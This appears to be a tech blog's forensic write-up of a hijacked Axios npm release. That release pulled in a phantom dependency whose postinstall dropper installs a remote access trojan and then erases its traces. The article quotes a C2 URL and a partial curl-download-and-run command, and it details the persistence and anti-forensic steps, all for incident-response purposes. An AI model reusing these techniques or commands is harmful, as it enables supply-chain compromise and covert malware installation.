Logo
HomeQ&AAnti-ScamNotifications
Comment
Technology

Technical Analysis: Axios npm Supply Chain Attack

Galvin Prescott
Galvin Prescott
Apr 1, 20265 min
0
0
0
91
Technical deep dive into the Axios npm compromise (v1.14.1 and v0.30.4). Analysis of the plain-crypto-js RAT dropper, OIDC bypass, and anti-forensic cleanup.

On March 30, 2026, the maintainer account for Axios, the most popular JavaScript HTTP client with over 100 million weekly downloads, was hijacked to publish poisoned releases containing a cross-platform remote access trojan (RAT). The attack targeted both the modern 1.x and legacy 0.x branches, utilizing sophisticated anti-forensic techniques to hide the malicious dependency from developers and security scanners.

Hijacked credentials and the bypass of OIDC Trusted Publishing

The compromise originated with the hijacking of the jasonsaayman npm account, a primary maintainer for the Axios project. Forensic evidence from the npm registry suggests the attacker obtained a long-lived classic access token, as the malicious versions—[email protected] and [email protected]—bypassed the project's established CI/CD pipeline.

A critical technical signal was the absence of OpenID Connect (OIDC) metadata. Since the move to secure publishing workflows, legitimate Axios 1.x releases have used npm’s OIDC Trusted Publisher mechanism, which cryptographically links a publish event to a specific GitHub Actions workflow. The malicious 1.14.1 release lacked this OIDC binding and the gitHead reference, indicating a manual publish from an external environment.

Furthermore, a binary diff between the clean 1.14.0 and poisoned 1.14.1 reveals that the only substantive change in the Axios package itself was the package.json file. The attacker manually incremented the version and injected a new runtime dependency: plain-crypto-js@^4.2.1. Notably, the prepare: husky script—responsible for enforcing git hooks—was removed during the manual edit, a common side effect of direct package.json modification outside of standard release tooling.

Anatomy of the plain-crypto-js phantom dependency

The core of the attack was not located within the Axios source code, but in a "phantom dependency" named plain-crypto-js. Static analysis confirms that plain-crypto-js is never imported or required by any of the 86 files in the Axios library. Its inclusion in the manifest served a single purpose: to trigger a postinstall hook during the npm install process.

To avoid detection by "zero-history" reputation scanners, the attacker pre-staged the malware 18 hours in advance.

  • Version 4.2.0 (Decoy): A clean copy of the legitimate crypto-js library, used to establish a benign footprint on the npm registry.

  • Version 4.2.1 (Weaponized): Introduced a postinstall: "node setup.js" script and an obfuscated dropper payload.

The attacker employed a bit-for-bit cloning strategy for the library's functional files, ensuring that any developer performing a manual diff against the real crypto-js would see no changes in the cryptographic logic, drawing focus away from the malicious package.json entry.

File[email protected][email protected]Technical Role
package.jsonNo scriptspostinstall addedExecution trigger
setup.jsNot present4.2 KB obfuscated JSRAT Dropper
package.mdNot presentClean JSON stubAnti-forensics replacement

De-obfuscating the cross-platform RAT dropper

The setup.js script utilized a two-layer obfuscation scheme. Sensitive strings, including Command and Control (C2) URLs and system commands, were XOR-ciphered and stored in a static array. Once decoded, the dropper reveals a highly organized execution path targeting Windows, macOS, and Linux.

The dropper contacts the C2 server at http://sfrclak.com:8000/6202033 using platform-specific identifiers. The use of the packages.npm.org/ prefix in the POST body appears designed to blend into network logs as routine registry traffic.

macOS (Darwin) Execution

On macOS, the dropper writes an AppleScript to /tmp/6202033 and executes it via osascript. This script downloads a stage-2 binary to /Library/Caches/com.apple.act.mond—a path mimicking a legitimate "Activity Monitor Daemon" system cache—before granting execution permissions and launching it via /bin/zsh.

Windows (Win32) Execution

The Windows payload utilizes a VBScript and PowerShell chain. It creates a persistent copy of powershell.exe in %PROGRAMDATA%\wt.exe (masquerading as Windows Terminal). A hidden cmd.exe window runs a VBScript that fetches a PowerShell stage-2 payload to the temp directory, executing it with an -ExecutionPolicy Bypass flag.

Linux and Unix-like Systems

For Linux, the dropper uses a direct shell command: curl -o /tmp/ld.py ... && nohup python3 /tmp/ld.py ... The use of nohup combined with the & operator ensures the malware is detached from the npm process tree and re-parented to PID 1 (init). This allows the RAT to remain active even after the initial installation process completes and the terminal is closed.

Runtime execution and anti-forensic cleanup

Verification of the attack via kernel-level instrumentation shows that the malware begins C2 contact within approximately two seconds of the start of an npm install. This speed is intentional, allowing the dropper to call home before automated security tools might terminate the process tree.

The most sophisticated aspect of the attack is its self-destruction sequence. After launching the platform-specific payload, setup.js performs three critical forensic cleanup steps:

  1. Self-Deletion: The setup.js file is unlinked from the filesystem.

  2. Manifest Erasure: The malicious package.json containing the postinstall hook is deleted.

  3. The Evidence Swap: The pre-staged package.md (a clean stub reporting version 4.2.0) is renamed to package.json.

Post-infection, running npm list will report that [email protected] is installed—a version that lacks the malicious hook—potentially leading incident responders to believe the system was not affected by the poisoned 4.2.1 release.

Remediation and the state of supply chain security

The malicious Axios versions were live for approximately three hours before being unpublished by the npm security team. However, due to the high download volume of Axios, thousands of CI/CD pipelines and developer environments may have been exposed.

Operators should verify the existence of the node_modules/plain-crypto-js/ directory. Because this package is not a dependency of any legitimate Axios release, its presence is a definitive indicator of compromise, regardless of the version reported by npm list.

This incident mirrors the supply chain attack forensic payload analysis recently observed in other ecosystems, highlighting a trend toward "surgical" injections that bypass CI/CD and focus on post-install hooks. Much like the tactics explored in the report on how Jia Tan infiltrated Linux, the Axios attack underscores the fragility of maintainer-based trust models in the absence of mandatory OIDC enforcement across all release branches.

Comments (0)

Sort by

Please login to comment

Sign in to share your thoughts and connect with the community

Loading...

Related news

Google launches Gemma 4, a new generation of open-source models built on Gemini technology. Learn about the technical specs, performance, and how to run it locally.

Google Gemma 4 Launch: Open-Source Models and Local Access

43 views•3 min
The Vivo X300 Ultra's Chinese launch reveals a significant price gap for international buyers. Explore the specs, import costs, and software limitations.

Importing the Vivo X300 Ultra: Costs, Specs, and Risks

62 views•4 min
Recent data reveals a surprising winner in vehicle durability. Learn why standard hybrids are outperforming both electric and gasoline cars in long-term reliability.

Hybrid vs. Electric vs. Gas Car Reliability Explained

68 views•4 min
As Apple marks 50 years, we examine the cultural and technical shifts that turned a garage startup into a $3.5 trillion titan through eight core product leaps.

Apple at 50: From Garage Startup to $3.5 Trillion Technology Pillar

150 views•3 min
A technical narrative of a 320GB production server failure, focusing on Samsung LRDIMM errors, kernel RAS logs, and the operational cost of technical negligence.

From Morning Crash to Evening Demolition: Proving a 320GB Production Server Failure When Management Derailed

76 views•6 min
Sony increases PlayStation 5 prices by $100, citing AI-driven memory demand and geopolitical instability. The hike affects PS5, PS5 Pro, and PlayStation Portal.

Sony Hikes PlayStation 5 Prices by $100 Amid Surging Memory Costs

78 views•3 min
A technical audit of Alibaba’s AgentScope framework, focusing on its three-layer architecture, four-tier fault tolerance, and multimodal ContentBlock system.

Alibaba AgentScope Technical Deep Dive: AOP and Fault Tolerance

189 views•4 min
Meta has initiated targeted layoffs across several divisions, including Reality Labs and Instagram, as it pivots its capital allocation toward AI development.

Meta Cuts Jobs Across Reality Labs to Fund AI Pivot

234 views•2 min
litellm 1.82.8 Supply Chain Attack: Forensic Analysis of the litellm_init.pth Payload

litellm 1.82.8 Supply Chain Attack: Forensic Payload Analysis

191 views•4 min
Epic Games reduces workforce by 1,000 and slashes $500 million in costs as Fortnite growth cools. Detailed analysis of the gaming sector's structural shift.

Epic Games Layoffs: 1,000 Cut Amid Fortnite Revenue Decline

49 views•3 min
OnePlus 15T debuts with Snapdragon 8 Elite Gen 5, 7,500mAh silicon-carbon battery, and 165Hz AMOLED. Global launch as OnePlus 15s expected for 2026

OnePlus 15T: Snapdragon 8 Elite Gen 5 & 7500mAh Battery Launch

65 views•4 min
Samsung's Galaxy S26 will reportedly support Apple’s AirDrop protocol. Discover how this cross-platform shift impacts the mobile ecosystem and user interoperability.

Samsung Galaxy S26 to Feature Native AirDrop Compatibility

57 views•4 min
Apple’s upcoming M5 Pro and M5 Max chips will reportedly utilize vertically stacked dies and 3D packaging to break current silicon performance barriers.

Apple M5 Pro and M5 Max to Feature 3D Hybrid Bonding

62 views•4 min
Lightpanda challenges Chromium's dominance with a Zig-based, cloud-native browser designed specifically for AI agents and high-speed machine automation.

Lightpanda: Why the Machine-First Browser Beats Chromium

93 views•5 min
OpenAI acquires Astral, creators of the ultra-fast Ruff linter, signaling a strategic shift toward high-performance Rust-based Python tooling for AI agents.

OpenAI Acquires Astral: The Rustification of AI Development

93 views•4 min
Future gaming laptops will feature advanced OLED displays and high-performance chips, but supply chain shifts and premium specs are driving MSRPs to record highs.

Next-Gen Gaming Laptop Prices to Surge Amid Component Shifts

62 views•4 min
Samsung suspends Galaxy Z TriFold sales just three months after launch. Explore the technical hurdles, supply chain impacts, and the future of foldable tech.

Samsung Halts Galaxy Z TriFold Sales: Strategic Retreat?

81 views•4 min
NVIDIA launches NemoClaw at GTC 2026, providing a secure infrastructure layer for autonomous OpenClaw agents on RTX PCs, DGX Spark, and cloud platforms.

NVIDIA NemoClaw: Securing the OpenClaw Agent Ecosystem

174 views•5 min
Cloudflare introduces Markdown for Agents to bridge the gap between AI reasoning and human readability. Explore the impact on LLM tool-calling and API design.

Markdown for Agents: Cloudflare’s New AI Protocol Explained

116 views•4 min
Discover why Tauri 2.0 and ByteDance's Lynx are disrupting React Native and Flutter. An investigative look at performance, security, and mobile architecture.

Tauri vs. Lynx vs. React Native: 2026 Framework Guide

77 views•4 min